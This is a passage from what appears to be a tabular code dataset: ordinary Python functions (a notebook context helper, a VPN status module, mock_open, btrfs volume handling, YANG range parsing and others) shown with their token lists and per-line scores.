text (string, lengths 75–104k) | code_tokens (sequence) | avg_line_len (float64, 7.91–980) | score (sequence)
---|---|---|---
def prepare_notebook_context(request, notebook_context):
    """Fill in notebook context with default values."""
    if not notebook_context:
        notebook_context = {}

    # Override notebook Jinja templates
    if "extra_template_paths" not in notebook_context:
        notebook_context["extra_template_paths"] = [os.path.join(os.path.dirname(__file__), "server", "templates")]

    # Furious invalid state follows if we let this slip through
    assert type(notebook_context["extra_template_paths"]) == list, "Got bad extra_template_paths {}".format(notebook_context["extra_template_paths"])

    # Jinja variables
    notebook_context["jinja_environment_options"] = notebook_context.get("jinja_environment_options", {})
    assert type(notebook_context["jinja_environment_options"]) == dict

    # XXX: Following passing of global variables to Jinja templates requires Jinja 2.8.0dev+ version and is not yet supported
    # http://jinja.pocoo.org/docs/dev/api/#jinja2.Environment.globals
    # notebook_context["jinja_environment_options"]["globals"] = notebook_context["jinja_environment_options"].get("globals", {})
    # globals_ = notebook_context["jinja_environment_options"]["globals"]
    #
    # assert type(globals_) == dict
    #
    # if not "home_url" in globals_:
    #     globals_["home_url"] = request.host_url
    #
    # if not "home_title" in globals_:
    #     globals_["home_title"] = "Back to site"

    # Tell notebook to correctly address WebSockets allow origin policy
    notebook_context["allow_origin"] = route_to_alt_domain(request, request.host_url)
    notebook_context["notebook_path"] = request.route_path("notebook_proxy", remainder="")

    # Record the hash of the current parameters, so we know if this user accesses the notebook in this or a different context
    if "context_hash" not in notebook_context:
        notebook_context["context_hash"] = make_dict_hash(notebook_context)

    print(notebook_context)
"def",
"prepare_notebook_context",
"(",
"request",
",",
"notebook_context",
")",
":",
"if",
"not",
"notebook_context",
":",
"notebook_context",
"=",
"{",
"}",
"# Override notebook Jinja templates",
"if",
"\"extra_template_paths\"",
"not",
"in",
"notebook_context",
":",
"notebook_context",
"[",
"\"extra_template_paths\"",
"]",
"=",
"[",
"os",
".",
"path",
".",
"join",
"(",
"os",
".",
"path",
".",
"dirname",
"(",
"__file__",
")",
",",
"\"server\"",
",",
"\"templates\"",
")",
"]",
"# Furious invalid state follows if we let this slip through",
"assert",
"type",
"(",
"notebook_context",
"[",
"\"extra_template_paths\"",
"]",
")",
"==",
"list",
",",
"\"Got bad extra_template_paths {}\"",
".",
"format",
"(",
"notebook_context",
"[",
"\"extra_template_paths\"",
"]",
")",
"# Jinja variables",
"notebook_context",
"[",
"\"jinja_environment_options\"",
"]",
"=",
"notebook_context",
".",
"get",
"(",
"\"jinja_environment_options\"",
",",
"{",
"}",
")",
"assert",
"type",
"(",
"notebook_context",
"[",
"\"jinja_environment_options\"",
"]",
")",
"==",
"dict",
"# XXX: Following passing of global variables to Jinja templates requires Jinja 2.8.0dev+ version and is not yet supported",
"# http://jinja.pocoo.org/docs/dev/api/#jinja2.Environment.globals",
"# notebook_context[\"jinja_environment_options\"][\"globals\"] = notebook_context[\"jinja_environment_options\"].get(\"globals\", {})",
"# globals_ = notebook_context[\"jinja_environment_options\"][\"globals\"]",
"#",
"# assert type(globals_) == dict",
"#",
"# if not \"home_url\" in globals_:",
"# globals_[\"home_url\"] = request.host_url",
"#",
"# if not \"home_title\" in globals_:",
"# globals_[\"home_title\"] = \"Back to site\"",
"# Tell notebook to correctly address WebSockets allow origin policy",
"notebook_context",
"[",
"\"allow_origin\"",
"]",
"=",
"route_to_alt_domain",
"(",
"request",
",",
"request",
".",
"host_url",
")",
"notebook_context",
"[",
"\"notebook_path\"",
"]",
"=",
"request",
".",
"route_path",
"(",
"\"notebook_proxy\"",
",",
"remainder",
"=",
"\"\"",
")",
"# Record the hash of the current parameters, so we know if this user accesses the notebook in this or different context",
"if",
"\"context_hash\"",
"not",
"in",
"notebook_context",
":",
"notebook_context",
"[",
"\"context_hash\"",
"]",
"=",
"make_dict_hash",
"(",
"notebook_context",
")",
"print",
"(",
"notebook_context",
")"
] | 46.804878 | [
0.017857142857142856,
0.03636363636363636,
0,
0.07142857142857142,
0.06896551724137931,
0,
0.05128205128205128,
0.037037037037037035,
0.02608695652173913,
0,
0.031746031746031744,
0.020134228187919462,
0,
0.09523809523809523,
0.02857142857142857,
0,
0.02857142857142857,
0,
0.024,
0.028985507246376812,
0,
0.023255813953488372,
0.0273972602739726,
0.4,
0.05714285714285714,
0.4,
0.05555555555555555,
0.04081632653061224,
0.4,
0.05263157894736842,
0.04081632653061224,
0,
0.028169014084507043,
0.03529411764705882,
0.03333333333333333,
0,
0.024390243902439025,
0.043478260869565216,
0.02666666666666667,
0,
0.07407407407407407
] |
def vpn_status(self):
    """Returns response dict"""
    # Start signal handler thread if it should be running
    if not self.check_pid and not self.thread_started:
        self._start_handler_thread()

    # Set color_bad as default output. Replaced if VPN active.
    name = None
    color = self.py3.COLOR_BAD

    # If we are acting like the default i3status module
    if self.check_pid:
        if self._check_pid():
            name = "yes"
            color = self.py3.COLOR_GOOD
    # Otherwise, find the VPN name, if it is active
    else:
        vpn = self._get_vpn_status()
        if vpn:
            name = ", ".join(vpn)
            color = self.py3.COLOR_GOOD

    # Format and create the response dict
    full_text = self.py3.safe_format(self.format, {"name": name})
    response = {
        "full_text": full_text,
        "color": color,
        "cached_until": self.py3.CACHE_FOREVER,
    }

    # Cache forever unless in check_pid mode
    if self.check_pid:
        response["cached_until"] = self.py3.time_in(self.cache_timeout)
    return response
"def",
"vpn_status",
"(",
"self",
")",
":",
"# Start signal handler thread if it should be running",
"if",
"not",
"self",
".",
"check_pid",
"and",
"not",
"self",
".",
"thread_started",
":",
"self",
".",
"_start_handler_thread",
"(",
")",
"# Set color_bad as default output. Replaced if VPN active.",
"name",
"=",
"None",
"color",
"=",
"self",
".",
"py3",
".",
"COLOR_BAD",
"# If we are acting like the default i3status module",
"if",
"self",
".",
"check_pid",
":",
"if",
"self",
".",
"_check_pid",
"(",
")",
":",
"name",
"=",
"\"yes\"",
"color",
"=",
"self",
".",
"py3",
".",
"COLOR_GOOD",
"# Otherwise, find the VPN name, if it is active",
"else",
":",
"vpn",
"=",
"self",
".",
"_get_vpn_status",
"(",
")",
"if",
"vpn",
":",
"name",
"=",
"\", \"",
".",
"join",
"(",
"vpn",
")",
"color",
"=",
"self",
".",
"py3",
".",
"COLOR_GOOD",
"# Format and create the response dict",
"full_text",
"=",
"self",
".",
"py3",
".",
"safe_format",
"(",
"self",
".",
"format",
",",
"{",
"\"name\"",
":",
"name",
"}",
")",
"response",
"=",
"{",
"\"full_text\"",
":",
"full_text",
",",
"\"color\"",
":",
"color",
",",
"\"cached_until\"",
":",
"self",
".",
"py3",
".",
"CACHE_FOREVER",
",",
"}",
"# Cache forever unless in check_pid mode",
"if",
"self",
".",
"check_pid",
":",
"response",
"[",
"\"cached_until\"",
"]",
"=",
"self",
".",
"py3",
".",
"time_in",
"(",
"self",
".",
"cache_timeout",
")",
"return",
"response"
] | 32.166667 | [
0.047619047619047616,
0.05714285714285714,
0,
0.03278688524590164,
0.034482758620689655,
0.05,
0,
0.030303030303030304,
0.10526315789473684,
0.058823529411764705,
0,
0.03389830508474576,
0.07692307692307693,
0.06060606060606061,
0.07142857142857142,
0.046511627906976744,
0,
0.03636363636363636,
0.15384615384615385,
0.05,
0.10526315789473684,
0.05405405405405406,
0.046511627906976744,
0,
0.044444444444444446,
0.028985507246376812,
0.15,
0.05714285714285714,
0.07407407407407407,
0.0392156862745098,
0.3333333333333333,
0,
0.041666666666666664,
0.07692307692307693,
0.02666666666666667,
0.08695652173913043
] |
def setup(self):
    '''Called after instantiation'''
    TelnetHandlerBase.setup(self)
    # Spawn a thread to handle socket input
    self.thread_ic = threading.Thread(target=self.inputcooker)
    self.thread_ic.setDaemon(True)
    self.thread_ic.start()
    # Note that inputcooker exits on EOF

    # Sleep for 0.5 second to allow options negotiation
    time.sleep(0.5)
"def",
"setup",
"(",
"self",
")",
":",
"TelnetHandlerBase",
".",
"setup",
"(",
"self",
")",
"# Spawn a thread to handle socket input",
"self",
".",
"thread_ic",
"=",
"threading",
".",
"Thread",
"(",
"target",
"=",
"self",
".",
"inputcooker",
")",
"self",
".",
"thread_ic",
".",
"setDaemon",
"(",
"True",
")",
"self",
".",
"thread_ic",
".",
"start",
"(",
")",
"# Note that inputcooker exits on EOF",
"# Sleep for 0.5 second to allow options negotiation",
"time",
".",
"sleep",
"(",
"0.5",
")"
] | 37.090909 | [
0.0625,
0.05,
0.05405405405405406,
0.0425531914893617,
0.030303030303030304,
0.05263157894736842,
0.06666666666666667,
0.045454545454545456,
0.25,
0.03389830508474576,
0.08695652173913043
] |
def release(self, conn):
    """Return the connection to the pool."""
    if conn.in_transaction:
        raise InvalidRequestError(
            "Cannot release a connection with "
            "an unfinished transaction"
        )
    raw = conn.connection
    res = yield from self._pool.release(raw)
    return res
"def",
"release",
"(",
"self",
",",
"conn",
")",
":",
"if",
"conn",
".",
"in_transaction",
":",
"raise",
"InvalidRequestError",
"(",
"\"Cannot release a connection with \"",
"\"not finished transaction\"",
")",
"raw",
"=",
"conn",
".",
"connection",
"res",
"=",
"yield",
"from",
"self",
".",
"_pool",
".",
"release",
"(",
"raw",
")",
"return",
"res"
] | 33.9 | [
0.041666666666666664,
0.044444444444444446,
0.06451612903225806,
0.07894736842105263,
0.0392156862745098,
0.047619047619047616,
0.23076923076923078,
0.06896551724137931,
0.041666666666666664,
0.1111111111111111
] |
def mock_open(mock=None, read_data=''):
    """
    A helper function to create a mock to replace the use of `open`. It works
    for `open` called directly or used as a context manager.

    The `mock` argument is the mock object to configure. If `None` (the
    default) then a `MagicMock` will be created for you, with the API limited
    to methods or attributes available on standard file handles.

    `read_data` is a string for the `read` method of the file handle to return.
    This is an empty string by default.
    """
    global file_spec
    if file_spec is None:
        # set on first use
        if inPy3k:
            import _io
            file_spec = list(set(dir(_io.TextIOWrapper)).union(set(dir(_io.BytesIO))))
        else:
            file_spec = file

    if mock is None:
        mock = MagicMock(name='open', spec=open)

    handle = MagicMock(spec=file_spec)
    handle.write.return_value = None
    handle.__enter__.return_value = handle
    handle.read.return_value = read_data

    mock.return_value = handle
    return mock
"def",
"mock_open",
"(",
"mock",
"=",
"None",
",",
"read_data",
"=",
"''",
")",
":",
"global",
"file_spec",
"if",
"file_spec",
"is",
"None",
":",
"# set on first use",
"if",
"inPy3k",
":",
"import",
"_io",
"file_spec",
"=",
"list",
"(",
"set",
"(",
"dir",
"(",
"_io",
".",
"TextIOWrapper",
")",
")",
".",
"union",
"(",
"set",
"(",
"dir",
"(",
"_io",
".",
"BytesIO",
")",
")",
")",
")",
"else",
":",
"file_spec",
"=",
"file",
"if",
"mock",
"is",
"None",
":",
"mock",
"=",
"MagicMock",
"(",
"name",
"=",
"'open'",
",",
"spec",
"=",
"open",
")",
"handle",
"=",
"MagicMock",
"(",
"spec",
"=",
"file_spec",
")",
"handle",
".",
"write",
".",
"return_value",
"=",
"None",
"handle",
".",
"__enter__",
".",
"return_value",
"=",
"handle",
"handle",
".",
"read",
".",
"return_value",
"=",
"read_data",
"mock",
".",
"return_value",
"=",
"handle",
"return",
"mock"
] | 33.129032 | [
0.02564102564102564,
0.2857142857142857,
0.03896103896103896,
0.05,
0,
0.056338028169014086,
0.05194805194805195,
0.03125,
0,
0.0379746835443038,
0.05128205128205128,
0.2857142857142857,
0.1,
0.08,
0.07692307692307693,
0.1111111111111111,
0.09090909090909091,
0.03488372093023256,
0.15384615384615385,
0.07142857142857142,
0,
0.1,
0.041666666666666664,
0,
0.05263157894736842,
0.05555555555555555,
0.047619047619047616,
0.05,
0,
0.06666666666666667,
0.13333333333333333
] |
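A minimal usage sketch for the helper above (this assumes the standard patching API; the patch target is 'builtins.open' on Python 3 and '__builtin__.open' on Python 2, and 'config.txt' is a hypothetical file name):

    from unittest.mock import patch  # or `from mock import patch` on older setups

    with patch('builtins.open', mock_open(read_data='hello')) as m:
        with open('config.txt') as f:
            contents = f.read()   # -> 'hello'
    m.assert_called_once_with('config.txt')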
def add_user_to_group(username, group):
    """Add a user to a group"""
    cmd = ['gpasswd', '-a', username, group]
    log("Adding user {} to group {}".format(username, group))
    subprocess.check_call(cmd)
"def",
"add_user_to_group",
"(",
"username",
",",
"group",
")",
":",
"cmd",
"=",
"[",
"'gpasswd'",
",",
"'-a'",
",",
"username",
",",
"group",
"]",
"log",
"(",
"\"Adding user {} to group {}\"",
".",
"format",
"(",
"username",
",",
"group",
")",
")",
"subprocess",
".",
"check_call",
"(",
"cmd",
")"
] | 41 | [
0.02564102564102564,
0.06451612903225806,
0.045454545454545456,
0.03278688524590164,
0.06666666666666667
] |
def clone(self, parent=None):
    """
    Clone this object.
    @param parent: The parent for the clone.
    @type parent: L{element.Element}
    @return: A copy of this object assigned to the new parent.
    @rtype: L{Attribute}
    """
    a = Attribute(self.qname(), self.value)
    a.parent = parent
    return a
"def",
"clone",
"(",
"self",
",",
"parent",
"=",
"None",
")",
":",
"a",
"=",
"Attribute",
"(",
"self",
".",
"qname",
"(",
")",
",",
"self",
".",
"value",
")",
"a",
".",
"parent",
"=",
"parent",
"return",
"a"
] | 31.545455 | [
0.034482758620689655,
0.18181818181818182,
0.07692307692307693,
0.041666666666666664,
0.05,
0.030303030303030304,
0.07142857142857142,
0.18181818181818182,
0.0425531914893617,
0.08,
0.125
] |
def remove(self, state_element, recursive=True, force=False, destroy=True):
    """Remove item from state

    :param StateElement state_element: State or state element to be removed
    :param bool recursive: Only applies to removal of state and decides whether the removal should be called
        recursively on all child states
    :param bool force: if the removal should be forced without checking constraints
    :param bool destroy: a flag that signals that the state element will be fully removed and disassembled
    """
    if isinstance(state_element, State):
        return self.remove_state(state_element.state_id, recursive=recursive, force=force, destroy=destroy)
    elif isinstance(state_element, Transition):
        return self.remove_transition(state_element.transition_id, destroy=destroy)
    elif isinstance(state_element, DataFlow):
        return self.remove_data_flow(state_element.data_flow_id, destroy=destroy)
    elif isinstance(state_element, ScopedVariable):
        return self.remove_scoped_variable(state_element.data_port_id, destroy=destroy)
    else:
        super(ContainerState, self).remove(state_element, force=force, destroy=destroy)
"def",
"remove",
"(",
"self",
",",
"state_element",
",",
"recursive",
"=",
"True",
",",
"force",
"=",
"False",
",",
"destroy",
"=",
"True",
")",
":",
"if",
"isinstance",
"(",
"state_element",
",",
"State",
")",
":",
"return",
"self",
".",
"remove_state",
"(",
"state_element",
".",
"state_id",
",",
"recursive",
"=",
"recursive",
",",
"force",
"=",
"force",
",",
"destroy",
"=",
"destroy",
")",
"elif",
"isinstance",
"(",
"state_element",
",",
"Transition",
")",
":",
"return",
"self",
".",
"remove_transition",
"(",
"state_element",
".",
"transition_id",
",",
"destroy",
"=",
"destroy",
")",
"elif",
"isinstance",
"(",
"state_element",
",",
"DataFlow",
")",
":",
"return",
"self",
".",
"remove_data_flow",
"(",
"state_element",
".",
"data_flow_id",
",",
"destroy",
"=",
"destroy",
")",
"elif",
"isinstance",
"(",
"state_element",
",",
"ScopedVariable",
")",
":",
"return",
"self",
".",
"remove_scoped_variable",
"(",
"state_element",
".",
"data_port_id",
",",
"destroy",
"=",
"destroy",
")",
"else",
":",
"super",
"(",
"ContainerState",
",",
"self",
")",
".",
"remove",
"(",
"state_element",
",",
"force",
"=",
"force",
",",
"destroy",
"=",
"destroy",
")"
] | 64.578947 | [
0.013333333333333334,
0.06060606060606061,
0,
0.0379746835443038,
0.03571428571428571,
0.046511627906976744,
0.04597701149425287,
0.03636363636363636,
0.18181818181818182,
0.045454545454545456,
0.02702702702702703,
0.0392156862745098,
0.034482758620689655,
0.04081632653061224,
0.03529411764705882,
0.03636363636363636,
0.03296703296703297,
0.15384615384615385,
0.03296703296703297
] |
def _fit(self, col):
    """Create a map of the empirical probability for each category.

    Args:
        col(pandas.DataFrame): Data to transform.
    """
    column = col[self.col_name].replace({np.nan: np.inf})
    frequencies = column.groupby(column).count().rename({np.inf: None}).to_dict()
    # next set probability ranges on interval [0,1]
    start = 0
    end = 0
    num_vals = len(col)
    for val in frequencies:
        prob = frequencies[val] / num_vals
        end = start + prob
        interval = (start, end)
        mean = np.mean(interval)
        std = prob / 6
        self.probability_map[val] = (interval, mean, std)
        start = end
"def",
"_fit",
"(",
"self",
",",
"col",
")",
":",
"column",
"=",
"col",
"[",
"self",
".",
"col_name",
"]",
".",
"replace",
"(",
"{",
"np",
".",
"nan",
":",
"np",
".",
"inf",
"}",
")",
"frequencies",
"=",
"column",
".",
"groupby",
"(",
"column",
")",
".",
"count",
"(",
")",
".",
"rename",
"(",
"{",
"np",
".",
"inf",
":",
"None",
"}",
")",
".",
"to_dict",
"(",
")",
"# next set probability ranges on interval [0,1]",
"start",
"=",
"0",
"end",
"=",
"0",
"num_vals",
"=",
"len",
"(",
"col",
")",
"for",
"val",
"in",
"frequencies",
":",
"prob",
"=",
"frequencies",
"[",
"val",
"]",
"/",
"num_vals",
"end",
"=",
"start",
"+",
"prob",
"interval",
"=",
"(",
"start",
",",
"end",
")",
"mean",
"=",
"np",
".",
"mean",
"(",
"interval",
")",
"std",
"=",
"prob",
"/",
"6",
"self",
".",
"probability_map",
"[",
"val",
"]",
"=",
"(",
"interval",
",",
"mean",
",",
"std",
")",
"start",
"=",
"end"
] | 32.545455 | [
0.05,
0.028169014084507043,
0,
0.15384615384615385,
0.03773584905660377,
0.18181818181818182,
0,
0.03278688524590164,
0.03529411764705882,
0.03636363636363636,
0.11764705882352941,
0.13333333333333333,
0.07407407407407407,
0,
0.06451612903225806,
0.043478260869565216,
0.06666666666666667,
0.05714285714285714,
0.05555555555555555,
0.07692307692307693,
0.03278688524590164,
0.08695652173913043
] |
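A worked trace of the interval bookkeeping above (hypothetical data, assuming the grouped categories come back in sorted order): for a column ['a', 'a', 'b', 'c'], frequencies is {'a': 2, 'b': 1, 'c': 1} and num_vals is 4, so the categories partition [0, 1] by empirical probability:

    # 'a' -> interval (0.0, 0.5),  mean 0.25,  std 0.5 / 6
    # 'b' -> interval (0.5, 0.75), mean 0.625, std 0.25 / 6
    # 'c' -> interval (0.75, 1.0), mean 0.875, std 0.25 / 6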
def add(self, val):
    """Add `val` to the current value.

    :type val: int
    :param val: Value to add.
    """
    if not isinstance(val, six.integer_types):
        raise ValueError("GaugePointLong only supports integer types")
    with self._value_lock:
        self.value += val
"def",
"add",
"(",
"self",
",",
"val",
")",
":",
"if",
"not",
"isinstance",
"(",
"val",
",",
"six",
".",
"integer_types",
")",
":",
"raise",
"ValueError",
"(",
"\"GaugePointLong only supports integer types\"",
")",
"with",
"self",
".",
"_value_lock",
":",
"self",
".",
"value",
"+=",
"val"
] | 31 | [
0.05263157894736842,
0.047619047619047616,
0,
0.13636363636363635,
0.09090909090909091,
0.18181818181818182,
0.04,
0.02702702702702703,
0.06666666666666667,
0.06896551724137931
] |
def path(ctx, paths):
    """DEPRECATED: use 'renku storage pull'."""
    click.secho('Use "renku storage pull" instead.', fg='red', err=True)
    ctx.exit(2)
"def",
"path",
"(",
"ctx",
",",
"paths",
")",
":",
"click",
".",
"secho",
"(",
"'Use \"renku storage pull\" instead.'",
",",
"fg",
"=",
"'red'",
",",
"err",
"=",
"True",
")",
"ctx",
".",
"exit",
"(",
"2",
")"
] | 38.75 | [
0.047619047619047616,
0.0425531914893617,
0.027777777777777776,
0.13333333333333333
] |
def _create_vxr(self, f, recStart, recEnd, currentVDR, priorVXR, vvrOffset):
    '''
    Create a VXR AND use a VXR

    Parameters:
        f : file
            The open CDF file
        recStart : int
            The start record of this block
        recEnd : int
            The ending record of this block
        currentVDR : int
            The byte location of the variable's VDR
        priorVXR : int
            The byte location of the previous VXR
        vvrOffset : int
            The byte location of the VVR

    Returns:
        vxroffset : int
            The byte location of the created VXR
    '''
    # add a VXR, use an entry, and link it to the prior VXR if it exists
    vxroffset = self._write_vxr(f)
    self._use_vxrentry(f, vxroffset, recStart, recEnd, vvrOffset)
    if (priorVXR == 0):
        # VDR's VXRhead
        self._update_offset_value(f, currentVDR+28, 8, vxroffset)
    else:
        # VXR's next
        self._update_offset_value(f, priorVXR+12, 8, vxroffset)
    # VDR's VXRtail
    self._update_offset_value(f, currentVDR+36, 8, vxroffset)
    return vxroffset
"def",
"_create_vxr",
"(",
"self",
",",
"f",
",",
"recStart",
",",
"recEnd",
",",
"currentVDR",
",",
"priorVXR",
",",
"vvrOffset",
")",
":",
"# add a VXR, use an entry, and link it to the prior VXR if it exists",
"vxroffset",
"=",
"self",
".",
"_write_vxr",
"(",
"f",
")",
"self",
".",
"_use_vxrentry",
"(",
"f",
",",
"vxroffset",
",",
"recStart",
",",
"recEnd",
",",
"vvrOffset",
")",
"if",
"(",
"priorVXR",
"==",
"0",
")",
":",
"# VDR's VXRhead",
"self",
".",
"_update_offset_value",
"(",
"f",
",",
"currentVDR",
"+",
"28",
",",
"8",
",",
"vxroffset",
")",
"else",
":",
"# VXR's next",
"self",
".",
"_update_offset_value",
"(",
"f",
",",
"priorVXR",
"+",
"12",
",",
"8",
",",
"vxroffset",
")",
"# VDR's VXRtail",
"self",
".",
"_update_offset_value",
"(",
"f",
",",
"currentVDR",
"+",
"36",
",",
"8",
",",
"vxroffset",
")",
"return",
"vxroffset"
] | 34.2 | [
0.013157894736842105,
0.18181818181818182,
0.058823529411764705,
0,
0.10526315789473684,
0.15,
0.06060606060606061,
0.11538461538461539,
0.043478260869565216,
0.125,
0.0425531914893617,
0.10714285714285714,
0.037037037037037035,
0.11538461538461539,
0.03773584905660377,
0.1111111111111111,
0.044444444444444446,
0,
0.125,
0.1111111111111111,
0.038461538461538464,
0,
0.18181818181818182,
0.02631578947368421,
0.05263157894736842,
0.028985507246376812,
0.07407407407407407,
0.07407407407407407,
0.028985507246376812,
0.15384615384615385,
0.08333333333333333,
0.029850746268656716,
0.08695652173913043,
0.03076923076923077,
0.08333333333333333
] |
def compile_pattern(word):
    """
    Take a word pattern and return a Python regexp. A word pattern is a word
    with unknown letters replaced by a '?', e.g. 'di?ti??nar?'.
    """
    return re.compile(r'^%s$' % re.sub(r'\?', '[a-z]',
                                       dicts.sanitize_word(word)))
"def",
"compile_pattern",
"(",
"word",
")",
":",
"return",
"re",
".",
"compile",
"(",
"r'^%s$'",
"%",
"re",
".",
"sub",
"(",
"r'\\?'",
",",
"'[a-z]'",
",",
"dicts",
".",
"sanitize_word",
"(",
"word",
")",
")",
")"
] | 42.714286 | [
0.038461538461538464,
0.2857142857142857,
0.02631578947368421,
0.031746031746031744,
0.2857142857142857,
0.05555555555555555,
0.06060606060606061
] |
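A quick illustrative check of the pattern compiler above (this assumes dicts.sanitize_word returns plain lowercase input unchanged; the pattern is hypothetical):

    pattern = compile_pattern('c?t')
    assert pattern.match('cat') and pattern.match('cot')
    assert not pattern.match('cart')  # anchored by ^...$; each '?' matches exactly one letter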
def _fillVolumesAndPaths(self, paths):
    """ Fill in paths.

    :arg paths: = { Store.Volume: ["linux path",]}
    """
    with self.btrfs as mount:
        for bv in mount.subvolumes:
            if not bv.readOnly:
                continue
            vol = self._btrfsVol2StoreVol(bv)
            if vol is None:
                continue
            path = bv.fullPath
            if path is None:
                logger.info("Skipping deleted volume %s", bv.uuid)
                continue
            relPath = None
            for path in bv.linuxPaths:
                path = self._relativePath(path)
                if path is None:
                    continue  # path is outside store scope
                paths[vol].append(path)
                infoPath = self._fullPath(path + Store.theInfoExtension)
                if os.path.exists(infoPath):
                    logger.debug("Reading %s", infoPath)
                    with open(infoPath) as info:
                        Store.Volume.readInfo(info)
                if not path.startswith("/"):
                    relPath = path
            if vol not in paths:
                continue
            logger.debug("%s", vol.display(sink=self, detail='phrase'))
            if vol.uuid in self.butterVolumes:
                logger.warn(
                    "Duplicate effective uuid %s in '%s' and '%s'",
                    vol.uuid, path, self.butterVolumes[vol.uuid].fullPath
                )
            self.butterVolumes[vol.uuid] = bv
            if relPath is not None:
                # vol is inside Store directory
                self.extraVolumes[vol] = relPath
"def",
"_fillVolumesAndPaths",
"(",
"self",
",",
"paths",
")",
":",
"with",
"self",
".",
"btrfs",
"as",
"mount",
":",
"for",
"bv",
"in",
"mount",
".",
"subvolumes",
":",
"if",
"not",
"bv",
".",
"readOnly",
":",
"continue",
"vol",
"=",
"self",
".",
"_btrfsVol2StoreVol",
"(",
"bv",
")",
"if",
"vol",
"is",
"None",
":",
"continue",
"path",
"=",
"bv",
".",
"fullPath",
"if",
"path",
"is",
"None",
":",
"logger",
".",
"info",
"(",
"\"Skipping deleted volume %s\"",
",",
"bv",
".",
"uuid",
")",
"continue",
"relPath",
"=",
"None",
"for",
"path",
"in",
"bv",
".",
"linuxPaths",
":",
"path",
"=",
"self",
".",
"_relativePath",
"(",
"path",
")",
"if",
"path",
"is",
"None",
":",
"continue",
"# path is outside store scope",
"paths",
"[",
"vol",
"]",
".",
"append",
"(",
"path",
")",
"infoPath",
"=",
"self",
".",
"_fullPath",
"(",
"path",
"+",
"Store",
".",
"theInfoExtension",
")",
"if",
"os",
".",
"path",
".",
"exists",
"(",
"infoPath",
")",
":",
"logger",
".",
"debug",
"(",
"\"Reading %s\"",
",",
"infoPath",
")",
"with",
"open",
"(",
"infoPath",
")",
"as",
"info",
":",
"Store",
".",
"Volume",
".",
"readInfo",
"(",
"info",
")",
"if",
"not",
"path",
".",
"startswith",
"(",
"\"/\"",
")",
":",
"relPath",
"=",
"path",
"if",
"vol",
"not",
"in",
"paths",
":",
"continue",
"logger",
".",
"debug",
"(",
"\"%s\"",
",",
"vol",
".",
"display",
"(",
"sink",
"=",
"self",
",",
"detail",
"=",
"'phrase'",
")",
")",
"if",
"vol",
".",
"uuid",
"in",
"self",
".",
"butterVolumes",
":",
"logger",
".",
"warn",
"(",
"\"Duplicate effective uuid %s in '%s' and '%s'\"",
",",
"vol",
".",
"uuid",
",",
"path",
",",
"self",
".",
"butterVolumes",
"[",
"vol",
".",
"uuid",
"]",
".",
"fullPath",
")",
"self",
".",
"butterVolumes",
"[",
"vol",
".",
"uuid",
"]",
"=",
"bv",
"if",
"relPath",
"is",
"not",
"None",
":",
"# vol is inside Store directory",
"self",
".",
"extraVolumes",
"[",
"vol",
"]",
"=",
"relPath"
] | 31.981818 | [
0.02631578947368421,
0.07692307692307693,
0,
0.09259259259259259,
0.18181818181818182,
0.06060606060606061,
0.05128205128205128,
0.05714285714285714,
0.07142857142857142,
0,
0.04081632653061224,
0.06451612903225806,
0.07142857142857142,
0,
0.058823529411764705,
0,
0.0625,
0.02857142857142857,
0.07142857142857142,
0,
0.06666666666666667,
0,
0.047619047619047616,
0.0392156862745098,
0,
0.05555555555555555,
0.031746031746031744,
0,
0.046511627906976744,
0,
0.02631578947368421,
0.041666666666666664,
0.03333333333333333,
0.038461538461538464,
0.03636363636363636,
0,
0.041666666666666664,
0.05263157894736842,
0,
0.05555555555555555,
0.07142857142857142,
0,
0.02666666666666667,
0,
0.04,
0.09375,
0.028169014084507043,
0.025974025974025976,
0.14285714285714285,
0,
0.04081632653061224,
0,
0.05128205128205128,
0.0392156862745098,
0.038461538461538464
] |
def choices(self):
    """ Print the choices for this question.

    This may be an empty string, and in the case of a list of validators
    we will only show the first validator's choices.
    """
    if isinstance(self.validator, list):
        return self.validator[0].print_choices()
    return self.validator.print_choices()
"def",
"choices",
"(",
"self",
")",
":",
"if",
"isinstance",
"(",
"self",
".",
"validator",
",",
"list",
")",
":",
"return",
"self",
".",
"validator",
"[",
"0",
"]",
".",
"print_choices",
"(",
")",
"return",
"self",
".",
"validator",
".",
"print_choices",
"(",
")"
] | 39.555556 | [
0.05555555555555555,
0.041666666666666664,
0,
0.02564102564102564,
0.03333333333333333,
0.18181818181818182,
0.045454545454545456,
0.038461538461538464,
0.044444444444444446
] |
def get_ranges(self, tchain, kw):
    """Return list of ranges defined in `tchain`.

    `kw` is the statement keyword determining the type of the
    range, i.e. 'range' or 'length'. `tchain` is the chain of type
    definitions from which the resulting range is obtained.

    The returned value is a list of tuples containing the segments
    of the resulting range.
    """
    (lo, hi) = ("min", "max")
    ran = None
    for t in tchain:
        rstmt = t.search_one(kw)
        if rstmt is None: continue
        parts = [ p.strip() for p in rstmt.arg.split("|") ]
        ran = [ [ i.strip() for i in p.split("..") ] for p in parts ]
        if ran[0][0] != 'min': lo = ran[0][0]
        if ran[-1][-1] != 'max': hi = ran[-1][-1]
    if ran is None: return None
    if len(ran) == 1:
        return [(lo, hi)]
    else:
        return [(lo, ran[0][-1])] + ran[1:-1] + [(ran[-1][0], hi)]
"def",
"get_ranges",
"(",
"self",
",",
"tchain",
",",
"kw",
")",
":",
"(",
"lo",
",",
"hi",
")",
"=",
"(",
"\"min\"",
",",
"\"max\"",
")",
"ran",
"=",
"None",
"for",
"t",
"in",
"tchain",
":",
"rstmt",
"=",
"t",
".",
"search_one",
"(",
"kw",
")",
"if",
"rstmt",
"is",
"None",
":",
"continue",
"parts",
"=",
"[",
"p",
".",
"strip",
"(",
")",
"for",
"p",
"in",
"rstmt",
".",
"arg",
".",
"split",
"(",
"\"|\"",
")",
"]",
"ran",
"=",
"[",
"[",
"i",
".",
"strip",
"(",
")",
"for",
"i",
"in",
"p",
".",
"split",
"(",
"\"..\"",
")",
"]",
"for",
"p",
"in",
"parts",
"]",
"if",
"ran",
"[",
"0",
"]",
"[",
"0",
"]",
"!=",
"'min'",
":",
"lo",
"=",
"ran",
"[",
"0",
"]",
"[",
"0",
"]",
"if",
"ran",
"[",
"-",
"1",
"]",
"[",
"-",
"1",
"]",
"!=",
"'max'",
":",
"hi",
"=",
"ran",
"[",
"-",
"1",
"]",
"[",
"-",
"1",
"]",
"if",
"ran",
"is",
"None",
":",
"return",
"None",
"if",
"len",
"(",
"ran",
")",
"==",
"1",
":",
"return",
"[",
"(",
"lo",
",",
"hi",
")",
"]",
"else",
":",
"return",
"[",
"(",
"lo",
",",
"ran",
"[",
"0",
"]",
"[",
"-",
"1",
"]",
")",
"]",
"+",
"ran",
"[",
"1",
":",
"-",
"1",
